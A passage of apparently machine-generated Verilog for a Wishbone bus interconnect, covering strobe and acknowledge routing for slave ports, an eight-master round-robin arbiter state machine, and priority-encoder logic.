    always @ (  ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) or  ( ( ( m0_slv_sel == 4'd4 ) ) ? ( m0_stb_i ) : ( 1'b0 ) ) or  ( ( ( m1_slv_sel == 4'd4 ) ) ? ( m1_stb_i ) : ( 1'b0 ) ) or  ( ( ( m2_slv_sel == 4'd4 ) ) ? ( m2_stb_i ) : ( 1'b0 ) ) or  ( ( ( m3_slv_sel == 4'd4 ) ) ? ( m3_stb_i ) : ( 1'b0 ) ) or  ( ( ( m4_slv_sel == 4'd4 ) ) ? ( m4_stb_i ) : ( 1'b0 ) ) or  ( ( ( m5_slv_sel == 4'd4 ) ) ? ( m5_stb_i ) : ( 1'b0 ) ) or  ( ( ( m6_slv_sel == 4'd4 ) ) ? ( m6_stb_i ) : ( 1'b0 ) ) or  ( ( ( m7_slv_sel == 4'd4 ) ) ? ( m7_stb_i ) : ( 1'b0 ) ))
    begin
        case ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s4_wb_stb_o = ( ( ( m0_slv_sel == 4'd4 ) ) ? ( m0_stb_i ) : ( 1'b0 ) );
        end
        3'd1:
        begin
            s4_wb_stb_o = ( ( ( m1_slv_sel == 4'd4 ) ) ? ( m1_stb_i ) : ( 1'b0 ) );
        end
        3'd2:
        begin
            s4_wb_stb_o = ( ( ( m2_slv_sel == 4'd4 ) ) ? ( m2_stb_i ) : ( 1'b0 ) );
        end
        3'd3:
        begin
            s4_wb_stb_o = ( ( ( m3_slv_sel == 4'd4 ) ) ? ( m3_stb_i ) : ( 1'b0 ) );
        end
        3'd4:
        begin
            s4_wb_stb_o = ( ( ( m4_slv_sel == 4'd4 ) ) ? ( m4_stb_i ) : ( 1'b0 ) );
        end
        3'd5:
        begin
            s4_wb_stb_o = ( ( ( m5_slv_sel == 4'd4 ) ) ? ( m5_stb_i ) : ( 1'b0 ) );
        end
        3'd6:
        begin
            s4_wb_stb_o = ( ( ( m6_slv_sel == 4'd4 ) ) ? ( m6_stb_i ) : ( 1'b0 ) );
        end
        3'd7:
        begin
            s4_wb_stb_o = ( ( ( m7_slv_sel == 4'd4 ) ) ? ( m7_stb_i ) : ( 1'b0 ) );
        end
        endcase
    end
    assign s4_m0_ack_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s4_ack_i );
    assign s4_m1_ack_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s4_ack_i );
    assign s4_m2_ack_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s4_ack_i );
    assign s4_m3_ack_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s4_ack_i );
    assign s4_m4_ack_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s4_ack_i );
    assign s4_m5_ack_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s4_ack_i );
    assign s4_m6_ack_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s4_ack_i );
    assign s4_m7_ack_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s4_ack_i );
    assign s4_m0_err_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s4_err_i );
    assign s4_m1_err_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s4_err_i );
    assign s4_m2_err_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s4_err_i );
    assign s4_m3_err_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s4_err_i );
    assign s4_m4_err_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s4_err_i );
    assign s4_m5_err_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s4_err_i );
    assign s4_m6_err_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s4_err_i );
    assign s4_m7_err_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s4_err_i );
    assign s4_m0_rty_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s4_rty_i );
    assign s4_m1_rty_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s4_rty_i );
    assign s4_m2_rty_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s4_rty_i );
    assign s4_m3_rty_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s4_rty_i );
    assign s4_m4_rty_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s4_rty_i );
    assign s4_m5_rty_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s4_rty_i );
    assign s4_m6_rty_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s4_rty_i );
    assign s4_m7_rty_o = ( ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s4_rty_i );
    assign s5_wb_data_i = s5_data_i;
    assign s5_data_o = s5_wb_data_o;
    assign s5_addr_o = s5_wb_addr_o;
    assign s5_sel_o = s5_wb_sel_o;
    assign s5_we_o = s5_wb_we_o;
    assign s5_cyc_o = s5_wb_cyc_o;
    assign s5_stb_o = s5_wb_stb_o;
    assign s5_wb_ack_i = s5_ack_i;
    assign s5_wb_err_i = s5_err_i;
    assign s5_wb_rty_i = s5_rty_i;
    always @ (  posedge clk_i)
    begin
        s5_next <=  ~( s5_wb_cyc_o);
    end
    assign s5_arb_req = { m7_s5_cyc_o, m6_s5_cyc_o, m5_s5_cyc_o, m4_s5_cyc_o, m3_s5_cyc_o, m2_s5_cyc_o, m1_s5_cyc_o, m0_s5_cyc_o };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s5_arb_state <= s5_arb_grant0;
        end
        else
        begin 
            s5_arb_state <= s5_arb_next_state;
        end
    end
    always @ (  s5_arb_state or  { m7_s5_cyc_o, m6_s5_cyc_o, m5_s5_cyc_o, m4_s5_cyc_o, m3_s5_cyc_o, m2_s5_cyc_o, m1_s5_cyc_o, m0_s5_cyc_o } or  1'b0)
    begin
        s5_arb_next_state = s5_arb_state;
        case ( s5_arb_state ) 
        s5_arb_grant0:
        begin
            if (  !( s5_arb_req[0]) | 1'b0 ) 
            begin
                if ( s5_arb_req[1] ) 
                begin
                    s5_arb_next_state = s5_arb_grant1;
                end
                else
                begin 
                    if ( s5_arb_req[2] ) 
                    begin
                        s5_arb_next_state = s5_arb_grant2;
                    end
                    else
                    begin 
                        if ( s5_arb_req[3] ) 
                        begin
                            s5_arb_next_state = s5_arb_grant3;
                        end
                        else
                        begin 
                            if ( s5_arb_req[4] ) 
                            begin
                                s5_arb_next_state = s5_arb_grant4;
                            end
                            else
                            begin 
                                if ( s5_arb_req[5] ) 
                                begin
                                    s5_arb_next_state = s5_arb_grant5;
                                end
                                else
                                begin 
                                    if ( s5_arb_req[6] ) 
                                    begin
                                        s5_arb_next_state = s5_arb_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s5_arb_req[7] ) 
                                        begin
                                            s5_arb_next_state = s5_arb_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_arb_grant1:
        begin
            if (  !( s5_arb_req[1]) | 1'b0 ) 
            begin
                if ( s5_arb_req[2] ) 
                begin
                    s5_arb_next_state = s5_arb_grant2;
                end
                else
                begin 
                    if ( s5_arb_req[3] ) 
                    begin
                        s5_arb_next_state = s5_arb_grant3;
                    end
                    else
                    begin 
                        if ( s5_arb_req[4] ) 
                        begin
                            s5_arb_next_state = s5_arb_grant4;
                        end
                        else
                        begin 
                            if ( s5_arb_req[5] ) 
                            begin
                                s5_arb_next_state = s5_arb_grant5;
                            end
                            else
                            begin 
                                if ( s5_arb_req[6] ) 
                                begin
                                    s5_arb_next_state = s5_arb_grant6;
                                end
                                else
                                begin 
                                    if ( s5_arb_req[7] ) 
                                    begin
                                        s5_arb_next_state = s5_arb_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s5_arb_req[0] ) 
                                        begin
                                            s5_arb_next_state = s5_arb_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_arb_grant2:
        begin
            if (  !( s5_arb_req[2]) | 1'b0 ) 
            begin
                if ( s5_arb_req[3] ) 
                begin
                    s5_arb_next_state = s5_arb_grant3;
                end
                else
                begin 
                    if ( s5_arb_req[4] ) 
                    begin
                        s5_arb_next_state = s5_arb_grant4;
                    end
                    else
                    begin 
                        if ( s5_arb_req[5] ) 
                        begin
                            s5_arb_next_state = s5_arb_grant5;
                        end
                        else
                        begin 
                            if ( s5_arb_req[6] ) 
                            begin
                                s5_arb_next_state = s5_arb_grant6;
                            end
                            else
                            begin 
                                if ( s5_arb_req[7] ) 
                                begin
                                    s5_arb_next_state = s5_arb_grant7;
                                end
                                else
                                begin 
                                    if ( s5_arb_req[0] ) 
                                    begin
                                        s5_arb_next_state = s5_arb_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s5_arb_req[1] ) 
                                        begin
                                            s5_arb_next_state = s5_arb_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_arb_grant3:
        begin
            if (  !( s5_arb_req[3]) | 1'b0 ) 
            begin
                if ( s5_arb_req[4] ) 
                begin
                    s5_arb_next_state = s5_arb_grant4;
                end
                else
                begin 
                    if ( s5_arb_req[5] ) 
                    begin
                        s5_arb_next_state = s5_arb_grant5;
                    end
                    else
                    begin 
                        if ( s5_arb_req[6] ) 
                        begin
                            s5_arb_next_state = s5_arb_grant6;
                        end
                        else
                        begin 
                            if ( s5_arb_req[7] ) 
                            begin
                                s5_arb_next_state = s5_arb_grant7;
                            end
                            else
                            begin 
                                if ( s5_arb_req[0] ) 
                                begin
                                    s5_arb_next_state = s5_arb_grant0;
                                end
                                else
                                begin 
                                    if ( s5_arb_req[1] ) 
                                    begin
                                        s5_arb_next_state = s5_arb_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s5_arb_req[2] ) 
                                        begin
                                            s5_arb_next_state = s5_arb_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_arb_grant4:
        begin
            if (  !( s5_arb_req[4]) | 1'b0 ) 
            begin
                if ( s5_arb_req[5] ) 
                begin
                    s5_arb_next_state = s5_arb_grant5;
                end
                else
                begin 
                    if ( s5_arb_req[6] ) 
                    begin
                        s5_arb_next_state = s5_arb_grant6;
                    end
                    else
                    begin 
                        if ( s5_arb_req[7] ) 
                        begin
                            s5_arb_next_state = s5_arb_grant7;
                        end
                        else
                        begin 
                            if ( s5_arb_req[0] ) 
                            begin
                                s5_arb_next_state = s5_arb_grant0;
                            end
                            else
                            begin 
                                if ( s5_arb_req[1] ) 
                                begin
                                    s5_arb_next_state = s5_arb_grant1;
                                end
                                else
                                begin 
                                    if ( s5_arb_req[2] ) 
                                    begin
                                        s5_arb_next_state = s5_arb_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s5_arb_req[3] ) 
                                        begin
                                            s5_arb_next_state = s5_arb_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_arb_grant5:
        begin
            if (  !( s5_arb_req[5]) | 1'b0 ) 
            begin
                if ( s5_arb_req[6] ) 
                begin
                    s5_arb_next_state = s5_arb_grant6;
                end
                else
                begin 
                    if ( s5_arb_req[7] ) 
                    begin
                        s5_arb_next_state = s5_arb_grant7;
                    end
                    else
                    begin 
                        if ( s5_arb_req[0] ) 
                        begin
                            s5_arb_next_state = s5_arb_grant0;
                        end
                        else
                        begin 
                            if ( s5_arb_req[1] ) 
                            begin
                                s5_arb_next_state = s5_arb_grant1;
                            end
                            else
                            begin 
                                if ( s5_arb_req[2] ) 
                                begin
                                    s5_arb_next_state = s5_arb_grant2;
                                end
                                else
                                begin 
                                    if ( s5_arb_req[3] ) 
                                    begin
                                        s5_arb_next_state = s5_arb_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s5_arb_req[4] ) 
                                        begin
                                            s5_arb_next_state = s5_arb_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_arb_grant6:
        begin
            if (  !( s5_arb_req[6]) | 1'b0 ) 
            begin
                if ( s5_arb_req[7] ) 
                begin
                    s5_arb_next_state = s5_arb_grant7;
                end
                else
                begin 
                    if ( s5_arb_req[0] ) 
                    begin
                        s5_arb_next_state = s5_arb_grant0;
                    end
                    else
                    begin 
                        if ( s5_arb_req[1] ) 
                        begin
                            s5_arb_next_state = s5_arb_grant1;
                        end
                        else
                        begin 
                            if ( s5_arb_req[2] ) 
                            begin
                                s5_arb_next_state = s5_arb_grant2;
                            end
                            else
                            begin 
                                if ( s5_arb_req[3] ) 
                                begin
                                    s5_arb_next_state = s5_arb_grant3;
                                end
                                else
                                begin 
                                    if ( s5_arb_req[4] ) 
                                    begin
                                        s5_arb_next_state = s5_arb_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s5_arb_req[5] ) 
                                        begin
                                            s5_arb_next_state = s5_arb_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_arb_grant7:
        begin
            if (  !( s5_arb_req[7]) | 1'b0 ) 
            begin
                if ( s5_arb_req[0] ) 
                begin
                    s5_arb_next_state = s5_arb_grant0;
                end
                else
                begin 
                    if ( s5_arb_req[1] ) 
                    begin
                        s5_arb_next_state = s5_arb_grant1;
                    end
                    else
                    begin 
                        if ( s5_arb_req[2] ) 
                        begin
                            s5_arb_next_state = s5_arb_grant2;
                        end
                        else
                        begin 
                            if ( s5_arb_req[3] ) 
                            begin
                                s5_arb_next_state = s5_arb_grant3;
                            end
                            else
                            begin 
                                if ( s5_arb_req[4] ) 
                                begin
                                    s5_arb_next_state = s5_arb_grant4;
                                end
                                else
                                begin 
                                    if ( s5_arb_req[5] ) 
                                    begin
                                        s5_arb_next_state = s5_arb_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s5_arb_req[6] ) 
                                        begin
                                            s5_arb_next_state = s5_arb_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s5_msel_req = { m7_s5_cyc_o, m6_s5_cyc_o, m5_s5_cyc_o, m4_s5_cyc_o, m3_s5_cyc_o, m2_s5_cyc_o, m1_s5_cyc_o, m0_s5_cyc_o };
    assign s5_msel_pri_enc_valid = { m7_s5_cyc_o, m6_s5_cyc_o, m5_s5_cyc_o, m4_s5_cyc_o, m3_s5_cyc_o, m2_s5_cyc_o, m1_s5_cyc_o, m0_s5_cyc_o };
    always @ (  s5_msel_pri_enc_valid[0] or  { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[1] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[0] ) ) })
    begin
        if (  !( s5_msel_pri_enc_valid[0]) ) 
        begin
            s5_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[1] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[0] ) ) } == 2'h0 ) 
            begin
                s5_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[1] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[0] ) ) } == 2'h1 ) 
                begin
                    s5_msel_pri_enc_pd0_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[1] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[0] ) ) } == 2'h2 ) 
                    begin
                        s5_msel_pri_enc_pd0_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s5_msel_pri_enc_pd0_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s5_msel_pri_enc_valid[0] or  { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[1] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[0] ) ) })
    begin
        if (  !( s5_msel_pri_enc_valid[0]) ) 
        begin
            s5_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[1] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[0] ) ) } == 2'h0 ) 
            begin
                s5_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s5_msel_pri_enc_pd0_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s5_msel_pri_enc_valid[1] or  { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[3] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[2] ) ) })
    begin
        if (  !( s5_msel_pri_enc_valid[1]) ) 
        begin
            s5_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[3] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[2] ) ) } == 2'h0 ) 
            begin
                s5_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[3] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[2] ) ) } == 2'h1 ) 
                begin
                    s5_msel_pri_enc_pd1_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[3] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[2] ) ) } == 2'h2 ) 
                    begin
                        s5_msel_pri_enc_pd1_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s5_msel_pri_enc_pd1_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s5_msel_pri_enc_valid[1] or  { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[3] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[2] ) ) })
    begin
        if (  !( s5_msel_pri_enc_valid[1]) ) 
        begin
            s5_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[3] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[2] ) ) } == 2'h0 ) 
            begin
                s5_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s5_msel_pri_enc_pd1_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s5_msel_pri_enc_valid[2] or  { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[5] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[4] ) ) })
    begin
        if (  !( s5_msel_pri_enc_valid[2]) ) 
        begin
            s5_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[5] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[4] ) ) } == 2'h0 ) 
            begin
                s5_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[5] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[4] ) ) } == 2'h1 ) 
                begin
                    s5_msel_pri_enc_pd2_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[5] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[4] ) ) } == 2'h2 ) 
                    begin
                        s5_msel_pri_enc_pd2_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s5_msel_pri_enc_pd2_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s5_msel_pri_enc_valid[2] or  { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[5] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[4] ) ) })
    begin
        if (  !( s5_msel_pri_enc_valid[2]) ) 
        begin
            s5_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[5] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[4] ) ) } == 2'h0 ) 
            begin
                s5_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s5_msel_pri_enc_pd2_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s5_msel_pri_enc_valid[3] or  { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[7] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[6] ) ) })
    begin
        if (  !( s5_msel_pri_enc_valid[3]) ) 
        begin
            s5_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
        end
        else
        begin 
